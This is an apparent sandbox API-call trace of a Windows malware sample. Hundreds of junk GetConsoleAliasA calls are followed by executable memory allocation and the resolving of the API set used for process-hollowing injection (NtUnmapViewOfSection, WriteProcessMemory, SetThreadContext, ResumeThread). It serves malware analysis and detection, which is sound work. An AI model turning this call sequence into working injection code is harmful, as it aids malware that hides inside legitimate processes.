TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.329] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.330] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.331] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.332] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.333] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.334] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0122.335] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0155.153] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0155.154] VirtualAlloc (lpAddress=0x0, dwSize=0x8048, flAllocationType=0x1000, flProtect=0x40) returned 0x20000 [0155.172] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0155.174] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0155.174] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0155.232] Module32First (hSnapshot=0x30, lpme=0x18eb6c) returned 1 [0155.232] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x30000 [0155.234] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0155.315] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0155.315] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0155.315] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0155.315] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0155.316] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0155.316] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0155.317] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0155.317] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0155.317] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0155.317] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0155.317] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0155.317] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0155.317] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0155.317] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0155.317] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0155.317] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0155.317] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0155.317] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0155.318] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0155.318] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff 